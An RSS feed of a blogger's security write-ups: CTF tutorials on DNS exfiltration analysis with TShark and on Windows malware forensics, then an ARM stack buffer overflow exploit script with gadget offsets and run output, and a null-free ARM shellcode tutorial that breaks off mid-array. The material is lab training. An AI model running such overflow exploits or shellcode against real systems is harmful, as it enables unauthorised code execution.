The latest articles on DEV Community by hextrace (@hextrace). https://dev.to/hextrace https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F361653%2F43122ef3-dc57-4fd4-828f-c6d3f4c30425.jpg https://dev.to/hextrace en hextrace Fri, 07 May 2021 12:31:10 +0000 https://dev.to/hextrace/thm-tshark-4kji https://dev.to/hextrace/thm-tshark-4kji <p>This is a quick writeup of the <a href="https://tryhackme.com/room/tshark">TShark</a> room of <a href="https://tryhackme.com">tryhackme.com</a>.</p> <h2> TShark </h2> <p>TShark is a network protocol analyzer. It lets you capture packet data from a live network, or read packets from a previously saved capture file, either printing a decoded form of those packets to the standard output or writing the packets to a file. </p> <h2> Reading PCAP Files </h2> <p>TShark will display and number the packets. We can also use <code>wc -l</code> to count them:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>$ tshark -r dns.cap 1 0.000000 192.168.170.8 → 192.168.170.20 DNS 70 Standard query 0x1032 TXT google.com 2 0.000530 192.168.170.20 → 192.168.170.8 DNS 98 Standard query response 0x1032 TXT google.com TXT 3 4.005222 192.168.170.8 → 192.168.170.20 DNS 70 Standard query 0xf76f MX google.com 4 4.837355 192.168.170.20 → 192.168.170.8 DNS 298 Standard query response 0xf76f MX google.com MX 40 smtp4.google.com MX 10 smtp5.google.com MX 10 smtp6.google.com MX 10 smtp1.google.com MX 10 smtp2.google.com MX 40 smtp3.google.com A 216.239.37.26 A 64.233.167.25 A 66.102.9.25 A 216.239.57.25 A 216.239.37.25 A 216.239.57.26 5 12.817185 192.168.170.8 → 192.168.170.20 DNS 70 Standard query 0x49a1 LOC google.com 6 12.956209 192.168.170.20 → 192.168.170.8 DNS 70 Standard query response 0x49a1 LOC google.com 7 20.824827 192.168.170.8 → 192.168.170.20 DNS 85 Standard query 0x9bbb PTR 104.9.192.66.in-addr.arpa 8 20.825333 192.168.170.20 → 192.168.170.8 DNS 129 Standard query response 0x9bbb PTR 104.9.192.66.in-addr.arpa PTR 66-192-9-104.gen.twtelecom.net 9 92.189905 192.168.170.8 → 192.168.170.20 DNS 74 Standard query 0x75c0 A www.netbsd.org 10 92.238816 192.168.170.20 → 192.168.170.8 DNS 90 Standard query response 0x75c0 A www.netbsd.org A 204.152.190.12 11 108.965135 192.168.170.8 → 192.168.170.20 DNS 74 Standard query 0xf0d4 AAAA www.netbsd.org 12 109.202803 192.168.170.20 → 192.168.170.8 DNS 102 Standard query response 0xf0d4 AAAA www.netbsd.org AAAA 2001:4f8:4:7:2e0:81ff:fe52:9a6b 13 169.027394 192.168.170.8 → 192.168.170.20 DNS 74 Standard query 0x7f39 AAAA www.netbsd.org 14 169.027781 192.168.170.20 → 192.168.170.8 DNS 102 Standard query response 0x7f39 AAAA www.netbsd.org AAAA 2001:4f8:4:7:2e0:81ff:fe52:9a6b 15 178.239844 192.168.170.8 → 192.168.170.20 DNS 74 Standard query 0x8db3 AAAA www.google.com 16 178.256382 192.168.170.20 → 192.168.170.8 DNS 94 Standard query response 0x8db3 AAAA www.google.com CNAME www.l.google.com 17 187.853816 192.168.170.8 → 192.168.170.20 DNS 76 Standard query 0xdca2 AAAA www.l.google.com 18 187.870481 192.168.170.20 → 192.168.170.8 DNS 76 Standard query response 0xdca2 AAAA www.l.google.com 19 228.708302 192.168.170.8 → 192.168.170.20 DNS 75 Standard query 0xbc1f AAAA www.example.com 20 228.941445 192.168.170.20 → 192.168.170.8 DNS 75 Standard query response 0xbc1f AAAA www.example.com 21 240.323938 192.168.170.8 → 192.168.170.20 DNS 79 Standard query 0x266d AAAA www.example.notginh 22 240.536930 192.168.170.20 → 192.168.170.8 DNS 79 Standard query response 0x266d No such name AAAA www.example.notginh 23 271.164734 192.168.170.8 → 192.168.170.20 DNS 71 Standard query 0xfee3 ANY www.isc.org 24 271.237338 192.168.170.20 → 192.168.170.8 DNS 115 Standard query response 0xfee3 ANY www.isc.org AAAA 2001:4f8:0:2::d A 204.152.184.88 25 271.241158 192.168.170.8 → 192.168.170.20 DNS 82 Standard query 0x5a53 PTR 1.0.0.127.in-addr.arpa 26 271.241746 192.168.170.20 → 192.168.170.8 DNS 105 Standard query response 0x5a53 PTR 1.0.0.127.in-addr.arpa PTR localhost 27 271.244120 192.168.170.8 → 192.168.170.20 DNS 67 Standard query 0x208a NS isc.org 28 271.259884 192.168.170.56 → 217.13.4.24 DNS 129 Standard query 0x326e SRV _ldap._tcp.Default-First-Site-Name._sites.dc._msdcs.utelsystems.local 29 271.262407 192.168.170.20 → 192.168.170.8 DNS 166 Standard query response 0x208a NS isc.org NS ns-ext.nrt1.isc.org NS ns-ext.sth1.isc.org NS ns-ext.isc.org NS ns-ext.lga1.isc.org 30 271.279695 217.13.4.24 → 192.168.170.56 DNS 129 Standard query response 0x326e No such name SRV _ldap._tcp.Default-First-Site-Name._sites.dc._msdcs.utelsystems.local 31 271.280350 192.168.170.56 → 217.13.4.24 DNS 98 Standard query 0xf161 SRV _ldap._tcp.dc._msdcs.utelsystems.local 32 271.297651 217.13.4.24 → 192.168.170.56 DNS 98 Standard query response 0xf161 No such name SRV _ldap._tcp.dc._msdcs.utelsystems.local 33 271.298194 192.168.170.56 → 217.13.4.24 DNS 140 Standard query 0x8361 SRV _ldap._tcp.05b5292b-34b8-4fb7-85a3-8beef5fd2069.domains._msdcs.utelsystems.local 34 271.317878 217.13.4.24 → 192.168.170.56 DNS 140 Standard query response 0x8361 No such name SRV _ldap._tcp.05b5292b-34b8-4fb7-85a3-8beef5fd2069.domains._msdcs.utelsystems.local 35 271.419659 192.168.170.56 → 217.13.4.24 DNS 83 Standard query 0xd060 A GRIMM.utelsystems.local 36 271.436583 217.13.4.24 → 192.168.170.56 DNS 83 Standard query response 0xd060 No such name A GRIMM.utelsystems.local 37 278.861300 192.168.170.56 → 217.13.4.24 DNS 83 Standard query 0x7663 A GRIMM.utelsystems.local 38 278.879313 217.13.4.24 → 192.168.170.56 DNS 83 Standard query response 0x7663 No such name A GRIMM.utelsystems.local $ tshark -r dns.cap | wc -l 38 </code></pre> </div> <p>TShark allows us to use "display filters" the same way as in Wireshark. Here, we filter DNS queries:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>$ tshark -r dns.cap -Y "dns.qry.type == 1" 9 92.189905 192.168.170.8 → 192.168.170.20 DNS 74 Standard query 0x75c0 A www.netbsd.org 10 92.238816 192.168.170.20 → 192.168.170.8 DNS 90 Standard query response 0x75c0 A www.netbsd.org A 204.152.190.12 35 271.419659 192.168.170.56 → 217.13.4.24 DNS 83 Standard query 0xd060 A GRIMM.utelsystems.local 36 271.436583 217.13.4.24 → 192.168.170.56 DNS 83 Standard query response 0xd060 No such name A GRIMM.utelsystems.local 37 278.861300 192.168.170.56 → 217.13.4.24 DNS 83 Standard query 0x7663 A GRIMM.utelsystems.local 38 278.879313 217.13.4.24 → 192.168.170.56 DNS 83 Standard query response 0x7663 No such name A GRIMM.utelsystems.local </code></pre> </div> <p>We can also filter the packet structure. Here we extract only the DNS name field:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>$ tshark -r dns.cap -Y "dns.qry.type == 1" -T fields -e dns.qry.name www.netbsd.org www.netbsd.org GRIMM.utelsystems.local GRIMM.utelsystems.local GRIMM.utelsystems.local GRIMM.utelsystems.local </code></pre> </div> <h2> DNS Exfiltration </h2> <p>Let's examine the pcap provided.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>$ tshark -r pcap | wc -l 125 </code></pre> </div> <p>We have 125 packets.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>$ tshark -r pcap -Y "dns.flags.response == 0" | wc -l 56 $ tshark -r pcap -T fields -e dns.qry.name | uniq | wc -l 56 </code></pre> </div> <p>There are 56 unique DNS queries.</p> <p>Now if we look at some packets, we notice a strange <code>0xbeef</code> transaction ID. It may be used on DNS server side to identify 'special' queries:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>$ tshark -r pcap | head -n2 1 0.000000 192.168.1.8 → 192.168.1.200 DNS 74 Standard query 0xbeef A M.m4lwhere.org 2 0.019731 192.168.1.200 → 192.168.1.8 DNS 90 Standard query response 0xbeef A M.m4lwhere.org A 52.207.163.69 </code></pre> </div> <p>One thing differs in the 125 packets: the subdomain! It may be used to exfiltrate data. Let's find this out:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>$ tshark -r pcap -Y "dns.flags.response == 0" -T fields -e "dns.qry.name" | sed "s/.m4lwhere.org//g" | tr -d "\n" MZWGCZ33OMYHE4SZL5RDA6L2L5EV65RTL5TDC3BTOJSUIXZXNA2HI7IK </code></pre> </div> <p>To auto-magically decode the exfiltered data, I rely on <a href="https://github.com/Ciphey/Ciphey">Ciphey</a><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>$ python3 -m ciphey -t "MZWGCZ33OMYHE4SZL5RDA6L2L5EV65RTL5TDC3BTOJSUIXZXNA2HI7IK" Result 'flag{th1s_is_t0ugh_with0u7_tsh4rk!}' (y/N): y Checker: passed with regex re.compile('(?i)(htb|thm|flag|ctf)\\{.*\\}', re.IGNORECASE) Format used: base32 utf8 Final result: "flag{s0rrY_b0yz_I_v3_f1l3reD_7h4t}" </code></pre> </div> challenge ctf tryhackme security hextrace Wed, 10 Mar 2021 13:26:29 +0000 https://dev.to/hextrace/investigating-windows-2-0-tryhackme-3m0j https://dev.to/hextrace/investigating-windows-2-0-tryhackme-3m0j <p>Here is the writeup for the room <a href="https://tryhackme.com/room/investigatingwindows2" rel="noopener noreferrer">Investigating Windows 2.0</a>.</p> <p>This room is the continuation of <a href="https://tryhackme.com/room/investigatingwindows" rel="noopener noreferrer">Investigating Windows</a>.</p> <h3> What registry key contains the same command that is executed within a scheduled task? </h3> <p>Open the task scheduler:</p> <p><a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fj86da9nr9r88pewvzq3r.PNG" class="article-body-image-wrapper"><img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fj86da9nr9r88pewvzq3r.PNG" alt="task scheduler"></a></p> <p>From Regedit, search for the task (e.g. <code>sekurlsa</code> or <code>LogonPasswords</code>). You'll end up there:</p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code> \HKCU\Environment\UserInitMprLogonScript </code></pre> </div> <h3> What analysis tool will immediately close if/when you attempt to launch it? </h3> <p>To get a good overview of the running maching, The SysInternals tools are the way to go. However, the famous process explorer refuses to start :</p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code> procexp64.exe </code></pre> </div> <h2> What is the full WQL Query associated with this script? </h2> <p>For this one, start Loki, the IOC scanner. It can take a while to run but it is super useful. It detected some suspicious/malicious files and gives us the culprit playing with <code>procexp64</code> through WQL queries:</p> <p><a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Frdqmyq1np555zwxqv8xg.PNG" class="article-body-image-wrapper"><img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Frdqmyq1np555zwxqv8xg.PNG" alt="LOKI"></a></p> <p>Query is:</p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code> SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName = 'procexp64.exe' </code></pre> </div> <h3> What is the script language? </h3> <p>Open the file <code>\TMP\WMIBackdoor.ps1</code>:</p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code> vbscript </code></pre> </div> <h3> What is the name of the other script? </h3> <p>We'll have to read/understand the script to find this one. Loki also found it:</p> <p><a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fapqxi9r7xqumsca73k2h.PNG" class="article-body-image-wrapper"><img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fapqxi9r7xqumsca73k2h.PNG" alt="LaunchBeaconingBackdoor"></a></p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code> LaunchBeaconingBackdoor </code></pre> </div> <h3> What is the name of the software company visible within the script? </h3> <p><a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fb8norvx2nqgqhtjzubxs.PNG" class="article-body-image-wrapper"><img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fb8norvx2nqgqhtjzubxs.PNG" alt="Motobit"></a></p> <p>We can read it within comments:</p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code> Motobit Software </code></pre> </div> <h3> What 2 websites are associated with this software company? </h3> <p>We can also read the two URLS within the script comments:</p> <ul> <li><code>http://www.motobit.com</code></li> <li><code>http://Motobit.cz</code></li> </ul> <h3> Search online for the name of the script from Q5 and one of the websites from the previous answer. What attack script comes up in your search? </h3> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code> WMIBackdoor.ps1 </code></pre> </div> <h3> What is the location of this file within the local machine? </h3> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code> C:\TMP </code></pre> </div> <h3> Which 2 processes open and close very quickly every few minutes? </h3> <p>By looking at the window titles:</p> <ol> <li><code>mim.exe</code></li> <li><code>powershell.exe</code></li> </ol> <h3> What is the parent process for these 2 processes? </h3> <p>We can start the SysInternals Process monitor <code>procmon64.exe</code>. The we can add filter on "Process Name" to <code>mim.exe</code> so we capture the process creation. In the properties of that event, we have the parent PID which is <code>916</code>. In task manager, we can get the name for the pid <code>916</code> which is:</p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code> svchost.exe </code></pre> </div> <h3> What is the first operation for the first of the 2 processes? </h3> <p>Again in the process monitor, we can capture the first opertion made which is:</p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code> Process Start </code></pre> </div> <h3> Inspect the properties for the 1st occurrence of this process. In the Event tab what are the 4 pieces of information displayed? </h3> <p>Go back to the event properties:</p> <ul> <li><code>Parent PID</code></li> <li><code>Command line</code></li> <li><code>Current directory</code></li> <li><code>Environment</code></li> </ul> <p>or </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code> Parent PID, Command line, Current directory, Environment </code></pre> </div> <h3> Inspect the disk operations, what is the name of the unusual process? </h3> <p>The hint tells us to use Process Hacker.</p> <p><a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8z4psaz2v993whh5bip3.PNG" class="article-body-image-wrapper"><img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8z4psaz2v993whh5bip3.PNG" alt="No Process"></a></p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code> No Process </code></pre> </div> <h3> Run Loki. Inspect the output. What is the name of the module after <code>Init</code>? </h3> <p>From 'loki-output.txt' MODULE section:</p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code> WMIScan </code></pre> </div> <h3> Regarding the 2nd warning, what is the name of the eventFilter? </h3> <p>From 'loki-output.txt' NAME section:</p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code> ProcessStartTrigger </code></pre> </div> <h3> For the 4th warning, what is the class name? </h3> <p>From 'loki-output.txt' CLASS section:</p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code> __FilterToConsumerBinding </code></pre> </div> <h3> What binary alert has the following 4d5a90000300000004000000ffff0000b8000000 as FIRST_BYTES? </h3> <p>From 'loki-output.txt' FIRST_BYTES section:</p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code> nbtscan.exe </code></pre> </div> <h3> According to the results, what is the description listed for reason 1? </h3> <p>From 'loki-output.txt' DESC section:</p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code> Known Bad / Dual use classics </code></pre> </div> <h3> Which binary alert is marked as APT Cloaked? </h3> <p>From 'loki-output.txt' FILE section</p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code> C:\TMP\p.exe </code></pre> </div> <p>or </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code> p.exe </code></pre> </div> <h3> What are the matches? </h3> <p>From 'loki-output.txt' MATCHES section</p> <ul> <li><code>psexesvc.exe</code></li> <li><code>Sysinternals PsExec</code></li> </ul> <p>or</p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code> psexesvc.exe, Sysinternals PsExec </code></pre> </div> <h3> Which binary alert is associated with somethingwindows.dmp found in C:\TMP? </h3> <p>From 'loki-output.txt' FILE/INFO:</p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code> C:\TMP\schtasks-backdoor.ps1 </code></pre> </div> <p>or simply</p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code> schtasks-backdoor.ps1 </code></pre> </div> <h3> Which binary is encrypted that is similar to a trojan? </h3> <p>Loki found a xor-encrypted binary ("Derusbi trojan") under <code>C:\TMP\xCmd.exe</code></p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code> xCmd.exe </code></pre> </div> <h3> There is a binary that can masquerade itself as a legitimate core Windows process/image. What is the full path of this binary? </h3> <p>Remember pid <code>916</code> under name <code>svchost</code>? Loki raised an alert for a <code>svchost</code> located at:</p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code> C:\Users\Public\svchost.exe </code></pre> </div> <h3> What is the full path location for the legitimate version? </h3> <p>Svchost is a system process that can host one or many Windows services. It is lcoated at</p> <ul> <li><code>%SystemRoot%\System32\Svchost.exe</code></li> <li><code>%SystemRoot%\SysWOW64\Svchost.exe</code></li> </ul> <p>and on the THM maching:</p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code> C:\Windows\System32 </code></pre> </div> <h3> What is the description listed for reason 1? </h3> <p>Look at the corresponding DESC section:</p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code> Stuff running where it normally shouldn't </code></pre> </div> <h3> There is a file in the same folder location that is labeled as a hacktool. What is the name of the file? </h3> <p>Next to the malicious <code>svchost.exe</code>, there is a strange javascript file:</p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code> en-US.js </code></pre> </div> <h3> What is the name of the Yara Rule MATCH? </h3> <p>Loki raised a warning for that file, with the rule:</p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code> CACTUSTORCH </code></pre> </div> <p>It looks like a javascript shellcode injector.</p> <h3> Which binary didn't show in the Loki results? </h3> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code> mim.exe </code></pre> </div> <h3> Complete the yar rule file located within the Tools folder on the Desktop. What are 3 strings to complete the rule in order to detect the binary Loki didn't hit on? </h3> <p>We'll have to complete the strings (regular expressions) of the provided yara rule. We can help ourselves with <code>strings64.exe</code> from SysInternals suite to test our regexps through <code>findstr</code> :</p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code> strings64.exe \tmp\mim.exe | findstr "??.?x?" strings64.exe \tmp\mim.exe | findstr "...exe" strings64.exe \tmp\mim.exe | findstr "mk.exe" </code></pre> </div> <p>Finally,</p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code> mk.ps1, mk.exe, v2.0.50727 </code></pre> </div> <p>Alright, you're done!</p> <p>This room was fun, I hope there's a 3.0 at some point! Congrats to heavenraiza, the creator of that one.</p> tryhackme writeup hextrace Sun, 31 Jan 2021 11:54:39 +0000 https://dev.to/hextrace/arm-hacking-shellcode-exec-1230 https://dev.to/hextrace/arm-hacking-shellcode-exec-1230 <p>In this exercise we'll hack control flow by rewriting <code>pc</code>, making it point to the hello wold shellcode we built in the previous article.</p> <p>Here is the vulnerable program:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight c"><code><span class="cp">#include &lt;stdio.h&gt; </span> <span class="kt">int</span> <span class="nf">main</span><span class="p">()</span> <span class="p">{</span> <span class="kt">char</span> <span class="n">buffer</span><span class="p">[</span><span class="mi">64</span><span class="p">];</span> <span class="n">gets</span><span class="p">(</span><span class="n">buffer</span><span class="p">);</span> <span class="p">}</span> </code></pre> </div> <p>We already know that a <code>pc</code> copy is saved on the stack at <code>buffer+68</code>. Here we're going to write code that will jump into our shellcode. Well use a <code>blx sp</code>. To do so, we'll find an address for that instruction (a gadget) using ropper. The gadget can be found in the mapped libc (aslr off):<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>root@azeria-labs-arm:~/protostarm/stack5# ldd stack5 linux-vdso.so.1 (0xb6ffd000) libc.so.6 =&gt; /lib/arm-linux-gnueabihf/libc.so.6 (0xb6ede000) /lib/ld-linux-armhf.so.3 (0xb6fd6000) </code></pre> </div> <p>We can use ropper to find a gadget allowing us to jump to <code>sp</code>; where our payload is located:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>root@azeria-labs-arm:~/protostarm/stack5# ropper -f /lib/arm-linux-gnueabihf/libc.so.6 --search "b%x sp" [INFO] Load gadgets from cache [LOAD] loading... 100% [LOAD] removing double gadgets... 100% [INFO] Searching for gadgets: b%x sp [INFO] File: /lib/arm-linux-gnueabihf/libc.so.6 0x0009f976 (0x0009f977): b #0x9f90e; mov r0, sb; bl #0x267e8; bl #0xa47c4; nop; bx sp; 0x0009f97a (0x0009f97b): bl #0x267e8; bl #0xa47c4; nop; bx sp; 0x0009f97e (0x0009f97f): bl #0xa47c4; nop; bx sp; 0x00008b28 (0x00008b29): blx sp; 0x00003db8 (0x00003db9): bx sp; </code></pre> </div> <p>Ok so our payload will look like:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>AAAAAAAA * 68 | gadget | shellcode </code></pre> </div> <p>The <code>blx sp</code> will allow us to jump in the stack, where the shellcode is written. Here is she exploit:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1">#!/usr/bin/env python3 </span> <span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> <span class="n">socket</span> <span class="o">=</span> <span class="n">ssh</span><span class="p">(</span><span class="n">host</span><span class="o">=</span><span class="s">'192.168.0.1'</span><span class="p">,</span> <span class="n">user</span><span class="o">=</span><span class="s">'root'</span><span class="p">,</span> <span class="n">password</span><span class="o">=</span><span class="s">''</span><span class="p">)</span> <span class="n">libc_base_addr</span> <span class="o">=</span> <span class="mh">0xb6ede000</span> <span class="n">blx_sp</span> <span class="o">=</span> <span class="n">struct</span><span class="p">.</span><span class="n">pack</span><span class="p">(</span><span class="s">'&lt;I'</span><span class="p">,</span> <span class="n">libc_base_addr</span> <span class="o">+</span> <span class="mh">0x8b28</span> <span class="o">+</span> <span class="mi">1</span><span class="p">)</span> <span class="n">shellcode</span> <span class="o">=</span> <span class="sa">b</span><span class="s">"</span><span class="se">\x01\x60\x8f\xe2\x16\xff\x2f\xe1\x06\x22\x79\x46\x0e\x31\x01\x20\x04\x27\x01\xdf\x24\x1b\x20\x1c\x01\x27\x01\xdf\x68\x65\x6c\x6c\x6f\x0a\x00\x00</span><span class="s">"</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">63</span> <span class="k">while</span> <span class="bp">True</span><span class="p">:</span> <span class="n">i</span> <span class="o">+=</span> <span class="mi">1</span> <span class="k">print</span><span class="p">(</span><span class="s">'test'</span><span class="p">,</span> <span class="n">i</span><span class="p">)</span> <span class="n">payload</span> <span class="o">=</span> <span class="sa">b</span><span class="s">'B'</span> <span class="o">*</span> <span class="n">i</span> <span class="n">payload</span> <span class="o">+=</span> <span class="n">blx_sp</span> <span class="n">payload</span> <span class="o">+=</span> <span class="n">shellcode</span> <span class="n">process</span> <span class="o">=</span> <span class="n">socket</span><span class="p">.</span><span class="n">process</span><span class="p">(</span><span class="s">'/root/protostarm/stack5/stack5'</span><span class="p">)</span> <span class="n">process</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span> <span class="k">try</span><span class="p">:</span> <span class="n">res</span> <span class="o">=</span> <span class="n">process</span><span class="p">.</span><span class="n">recv</span><span class="p">().</span><span class="n">decode</span><span class="p">()</span> <span class="k">print</span><span class="p">(</span><span class="n">res</span><span class="p">)</span> <span class="k">if</span> <span class="s">'hello'</span> <span class="ow">in</span> <span class="n">res</span><span class="p">:</span> <span class="n">process</span><span class="p">.</span><span class="n">close</span><span class="p">()</span> <span class="k">break</span> <span class="k">except</span> <span class="nb">EOFError</span><span class="p">:</span> <span class="k">pass</span> <span class="n">process</span><span class="p">.</span><span class="n">close</span><span class="p">()</span> <span class="n">socket</span><span class="p">.</span><span class="n">close</span><span class="p">()</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>user@Azeria-Lab-VM:~/protoarm/stack5$ ./exploit.py [+] Connecting to 192.168.0.1 on port 22: Done [*] root@192.168.0.1: Distro Debian testing OS: linux Arch: arm Version: 4.9.0 ASLR: Disabled test 64 [+] Starting remote process '/root/protostarm/stack5/stack5' on 192.168.0.1: pid 1705 [*] Stopped remote process 'stack5' on 192.168.0.1 (pid 1705) test 65 [+] Starting remote process '/root/protostarm/stack5/stack5' on 192.168.0.1: pid 1709 [*] Stopped remote process 'stack5' on 192.168.0.1 (pid 1709) test 66 [+] Starting remote process '/root/protostarm/stack5/stack5' on 192.168.0.1: pid 1714 [*] Stopped remote process 'stack5' on 192.168.0.1 (pid 1714) test 67 [+] Starting remote process '/root/protostarm/stack5/stack5' on 192.168.0.1: pid 1719 [*] Stopped remote process 'stack5' on 192.168.0.1 (pid 1719) test 68 [+] Starting remote process '/root/protostarm/stack5/stack5' on 192.168.0.1: pid 1723 hello\x00 [*] Stopped remote process 'stack5' on 192.168.0.1 (pid 1723) [*] Closed connection to '192.168.0.1' </code></pre> </div> <p>There are more techniques to exploit this kind of vulnerabilities and to defeat protections.</p> security hextrace Sat, 30 Jan 2021 21:43:05 +0000 https://dev.to/hextrace/arm-shellcode-32do https://dev.to/hextrace/arm-shellcode-32do <p>Lets transform the hello world code we wrote in the previous blog entry into a shellcode.</p> <p>To remove all null bytes, we'll switch to THUMB mode. We also must find or apply some known tricks (e.g. init a register with zero).</p> <p>This is our hello world in thumb without null bytes:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>root@azeria-labs-arm:~/arm/hello# cat hello.s .text .global _start _start: .code 32 add r6, pc, #1 bx r6 .code 16 mov r2, #6 @ strlen mov r1, pc @ load pc add r1, #14 @ add str offset from pc mov r0, #1 @ stdout mov r7, #4 @ nr_write svc #1 @ syscall sub r4, r4, r4 @ r4 = 0 mov r0, r4 @ exit 0 mov r7, #1 @ nr_exit svc #1 .asciz "hello\n" @ null terminated string </code></pre> </div> <p>We can assemble it and verify it has no null bytes:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>root@azeria-labs-arm:~/arm/hello# as hello.s <span class="nt">-o</span> hello.o <span class="nt">-mthumb</span> root@azeria-labs-arm:~/arm/hello# objdump <span class="nt">-d</span> hello.o hello.o: file format elf32-littlearm Disassembly of section .text: 00000000 &lt;_start&gt;: 0: e28f6001 add r6, pc, <span class="c">#1</span> 4: e12fff16 bx r6 8: 2206 movs r2, <span class="c">#6</span> a: 4679 mov r1, pc c: 310e adds r1, <span class="c">#14</span> e: 2001 movs r0, <span class="c">#1</span> 10: 2704 movs r7, <span class="c">#4</span> 12: df01 svc 1 14: 1b24 subs r4, r4, r4 16: 1c20 adds r0, r4, <span class="c">#0</span> 18: 2701 movs r7, <span class="c">#1</span> 1a: df01 svc 1 1c: 6c6c6568 .word 0x6c6c6568 20: 0a6f .short 0x0a6f ... </code></pre> </div> <p>Ok let's try it:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>root@azeria-labs-arm:~/arm/hello# ld hello.o <span class="nt">-o</span> hello root@azeria-labs-arm:~/arm/hello# ./hello hello </code></pre> </div> <p>Good now let's try to execute it from C code. First we retrieve opcodes:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>root@azeria-labs-arm:~/arm/hello# objcopy <span class="nt">-O</span> binary hello.o hello.bin root@azeria-labs-arm:~/arm/hello# xxd <span class="nt">-i</span> hello.bin unsigned char hello_bin[] <span class="o">=</span> <span class="o">{</span> 0x01, 0x60, 0x8f, 0xe2, 0x16, 0xff, 0x2f, 0xe1, 0x06, 0x22, 0x79, 0x46, 0x0e, 0x31, 0x01, 0x20, 0x04, 0x27, 0x01, 0xdf, 0x24, 0x1b, 0x20, 0x1c, 0x01, 0x27, 0x01, 0xdf, 0x68, 